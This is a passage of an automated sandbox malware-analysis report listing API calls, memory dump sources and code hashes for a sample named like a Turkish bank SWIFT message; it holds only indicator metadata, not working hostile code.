                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FeaturePresentProcessor
                                                                                                                                                        • String ID: Genu$ineI$ntel
                                                                                                                                                        • API String ID: 2325560087-3389352399
                                                                                                                                                        • Opcode ID: 3e5c164ff3ae685a3ad98f59bf8a023a28eea6540f7d90e0e61a46e9102dcb08
                                                                                                                                                        • Instruction ID: 84727303050079d51196e5d885c67506fcd639fe60951b9dc554368a55f0c2d3
                                                                                                                                                        • Opcode Fuzzy Hash: 3e5c164ff3ae685a3ad98f59bf8a023a28eea6540f7d90e0e61a46e9102dcb08
                                                                                                                                                        • Instruction Fuzzy Hash: E0318BB1D017169BDB648FA9E84925AFBF0FB06714F18C53EE459E7A60C3769890CF40
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 000A22A1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 000A22A8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                                        • Opcode ID: f11eeaf84ee8e92e34cd876a19743da3bd16b6f041395b65bc8a9cff27792495
                                                                                                                                                        • Instruction ID: 724496c888f42a7249377ab2d14a6600087d38c45e49c20bd9a27d941f408eac
                                                                                                                                                        • Opcode Fuzzy Hash: f11eeaf84ee8e92e34cd876a19743da3bd16b6f041395b65bc8a9cff27792495
                                                                                                                                                        • Instruction Fuzzy Hash: FAE04F746A4340ABEB516FB1FD4EB083B55AB0AB01F500064F682D64F0DBF4C0D0CB04
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 000A22A1
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 000A22A8
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                                        • Opcode ID: d43f51e4ed8bffdae57d8f1a8d684d7156216033d59801138b79679a651773fd
                                                                                                                                                        • Instruction ID: 159fd5a93debd443665ee9153b45b5c7687b4f9b959982e105a46e13d07d274e
                                                                                                                                                        • Opcode Fuzzy Hash: d43f51e4ed8bffdae57d8f1a8d684d7156216033d59801138b79679a651773fd
                                                                                                                                                        • Instruction Fuzzy Hash: 2EE017347E4301AAEA612BF5AD0AB283654AB16B02F404060B282D64F0CBF484808B08
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,000A2276), ref: 000A2376
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 000A237D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                                                        • Opcode ID: 87ebfdb383f4e042f64377c2546841f6d82f9a82d078a3c2b63f1a0430e1f783
                                                                                                                                                        • Instruction ID: 8f851de7c4cb42bcfcd8349b810af0cbba209d3f03c6cf387fa04f1591ab1a87
                                                                                                                                                        • Opcode Fuzzy Hash: 87ebfdb383f4e042f64377c2546841f6d82f9a82d078a3c2b63f1a0430e1f783
                                                                                                                                                        • Instruction Fuzzy Hash: 4DE0BF745843009BDB615FA1FD0DB043A65B71AB05F110434F289D28F0CBF595C08A14
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,00000000,000842EC,?,000842AA,?), ref: 00084304
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00084316
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-1355242751
                                                                                                                                                        • Opcode ID: 450251907a327a734346ffd0aebdf13c2658ec070c82d6119a290b1d005de250
                                                                                                                                                        • Instruction ID: c5c472e2e7043be2dc664ab60ee84d9ad19617fde025fd692e6741d1192183ff
                                                                                                                                                        • Opcode Fuzzy Hash: 450251907a327a734346ffd0aebdf13c2658ec070c82d6119a290b1d005de250
                                                                                                                                                        • Instruction Fuzzy Hash: 22D0A930800B13AFC7206FA0F80D602B6E8BB08302F00842AF8D2D2660EBF0C8C08B60
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,000841BB,00084341,?,0008422F,?,000841BB,?,?,?,?,000839FE,?,00000001), ref: 00084359
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0008436B
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-3689287502
                                                                                                                                                        • Opcode ID: 663cf6bc623f19c6390b618881792ec15fb6290bad1d0e82dd04f1847ee0e85a
                                                                                                                                                        • Instruction ID: 3d09a1835b6140c1bab97a8ac276ea43080205741f067297fd777c2e763ddbea
                                                                                                                                                        • Opcode Fuzzy Hash: 663cf6bc623f19c6390b618881792ec15fb6290bad1d0e82dd04f1847ee0e85a
                                                                                                                                                        • Instruction Fuzzy Hash: 19D0A7704007139FC7206FB0F80960176D4BB14715F004439E4D1D2550DBF0D8C08750
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,000C051D,?,000C05FE), ref: 000C0547
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 000C0559
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                                                        • Opcode ID: 0d475d61e97da9542237983071d326ef45e1a067864595a56b62da470a508136
                                                                                                                                                        • Instruction ID: 56717620924b3b27b9c8ef9486197e6c4c0dbf8baa750ead29f684e245fcb2f2
                                                                                                                                                        • Opcode Fuzzy Hash: 0d475d61e97da9542237983071d326ef45e1a067864595a56b62da470a508136
                                                                                                                                                        • Instruction Fuzzy Hash: FAD0C770544B12DFD7609F65F809B46B6E8AB14711F50C41DF596D2650DBB0CCC0CA50
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,000C052F,?,000C06D7), ref: 000C0572
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 000C0584
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                                                        • Opcode ID: 8f91031af16bd4f92034c3edb47abb6c0f604494bd8b54beaa342d90fbaf4a02
                                                                                                                                                        • Instruction ID: be2ffe418c63c62a58409fee88c88fe44ef3e0802101c2527e6750e2f804c5ae
                                                                                                                                                        • Opcode Fuzzy Hash: 8f91031af16bd4f92034c3edb47abb6c0f604494bd8b54beaa342d90fbaf4a02
                                                                                                                                                        • Instruction Fuzzy Hash: F5D0C770544712DFDB606F75F809F47B7E8AB04711F10C51DE895D2590DBB0D8C0CA60
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,000DBAD3,?,000DAA3F), ref: 000DBAEB
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 000DBAFD
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-199464113
                                                                                                                                                        • Opcode ID: 40b46272642ef3e87a9c19448e6ca7b3f3e70cbe23c624c3556d9afb19ffffb0
                                                                                                                                                        • Instruction ID: b50b332ccc64cf9fe33d8560fc4e5212e2e3111ae0185f3a0a4283fadd977b7f
                                                                                                                                                        • Opcode Fuzzy Hash: 40b46272642ef3e87a9c19448e6ca7b3f3e70cbe23c624c3556d9afb19ffffb0
                                                                                                                                                        • Instruction Fuzzy Hash: 80D0A930900712DFC7307FA0F84AB56B6E8AB06320F01842BE883D2650EBF0D8C0CA60
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0009DF7F,0000000C,0009DEA0,0011DC38,?,?), ref: 0009DF97
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0009DFA9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                                                        • Opcode ID: 2476e5c9ccb811350891e6a7ae7d9e17c209015608272d11c562ec1bbfce6d50
                                                                                                                                                        • Instruction ID: 091e82439ffd87d2c1b110b3140e5d27860ca601f933cd91d3dd44db89711eba
                                                                                                                                                        • Opcode Fuzzy Hash: 2476e5c9ccb811350891e6a7ae7d9e17c209015608272d11c562ec1bbfce6d50
                                                                                                                                                        • Instruction Fuzzy Hash: D6D0C9719447129FDF746FA5F81A642B6E8AB05715F10843FE89AD2650EBB4DCC08AA0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: fdaea21f50fa89269e1880d2e283420ed18724fa56604f998094a92b2b929bdd
                                                                                                                                                        • Instruction ID: 20e27ec45f249da9255b51d3593bbe51a4682428ca730fe2733496ebabbf42f0
                                                                                                                                                        • Opcode Fuzzy Hash: fdaea21f50fa89269e1880d2e283420ed18724fa56604f998094a92b2b929bdd
                                                                                                                                                        • Instruction Fuzzy Hash: 37C13B75A0021AEFDB14DF94C884AEEBBB5FF48700F108598EA15EB251D771EE41DBA0
                                                                                                                                                        APIs
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 000DAAB4
                                                                                                                                                        • CoUninitialize.OLE32 ref: 000DAABF
                                                                                                                                                          • Part of subcall function 000C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000C027B
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000DAACA
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000DAD9D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 780911581-0
                                                                                                                                                        • Opcode ID: 7e61c799dee093274f497c6a1fd623af299a0c0714b3ffa5c4a232ee1efbdac0
                                                                                                                                                        • Instruction ID: 25a9d5128b2189ccedd14040c56a14290901589e7ef88151229cf39504857b56
                                                                                                                                                        • Opcode Fuzzy Hash: 7e61c799dee093274f497c6a1fd623af299a0c0714b3ffa5c4a232ee1efbdac0
                                                                                                                                                        • Instruction Fuzzy Hash: 32A12575304701AFCB11EF14C881B6AB7E5BF99720F14844AF9969B3A2CB30ED41DB96
                                                                                                                                                        APIs
                                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 000B91DD
                                                                                                                                                        • SysAllocString.OLEAUT32(00000048), ref: 000B9286
                                                                                                                                                        • VariantCopy.OLEAUT32(00000000,00000000), ref: 000B92B5
                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 000B92DC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Variant$AllocClearCopyInitString
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2808897238-0
                                                                                                                                                        • Opcode ID: 0ff6597c881c4a936e89fb11bbb0fae6ae086841d4085ce9a690accb6bdc70b9
                                                                                                                                                        • Instruction ID: fde823ed2352525e54eee027d6f20cb1eadf06532305b8418aa6ae1a660d3400
                                                                                                                                                        • Opcode Fuzzy Hash: 0ff6597c881c4a936e89fb11bbb0fae6ae086841d4085ce9a690accb6bdc70b9
                                                                                                                                                        • Instruction Fuzzy Hash: B251A330A04706ABDB74AF65D891BEEB3E5EF45710F20881FE786DB2D2DB7099808715
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3877424927-0
                                                                                                                                                        • Opcode ID: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                                        • Instruction ID: a27e727ff90422fe22fcf1609189fe6675ca88bbf1d49f91fea7219af2b9ee2c
                                                                                                                                                        • Opcode Fuzzy Hash: 065ad613f1183b824f05baa70d3d15c8958660488bca00daffb81e2f860a9d07
                                                                                                                                                        • Instruction Fuzzy Hash: 0051C3B0A04305ABDB788FE9C8856AE77E1AF42320F24872DF825962D1D7759F508B40
                                                                                                                                                        APIs
                                                                                                                                                        • GetWindowRect.USER32(00D06470,?), ref: 000EC544
                                                                                                                                                        • ScreenToClient.USER32(?,00000002), ref: 000EC574
                                                                                                                                                        • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 000EC5DA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_0_2_80000_Ziraat_Bankasi_Swift_Mesaji_BXB04958T.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$ClientMoveRectScreen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3880355969-0
                                                                                                                                                        • Opcode ID: 8905ca0f1caa22923a457767c54920083b23422aac051119cc3696f846f06eba
                                                                                                                                                        • Instruction ID: cb6ae16aeb1df17c708b8740525600aab8e885a24fd99c6c84ee764bd0e3ea59
                                                                                                                                                        • Opcode Fuzzy Hash: 8905ca0f1caa22923a457767c54920083b23422aac051119cc3696f846f06eba
                                                                                                                                                        • Instruction Fuzzy Hash: 9A517C75900644EFDF20DF69C880EAE7BB6FB45320F108259F865AB290D771ED82CB90
                                                                                                                                                        APIs
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 000BC462
                                                                                                                                                        • __itow.LIBCMT ref: 000BC49C
                                                                                                                                                          • Part of subcall function 000BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 000BC753
                                                                                                                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 000BC505
                                                                                                                                                        • __itow.LIBCMT ref: 000BC55A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000000.00000002.1259859448.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                                                                                                                                                        • Associated: 00000000.00000002.1259842082.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259917124.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259961981.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                        • Associated: 00000000.00000002.1259979132.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
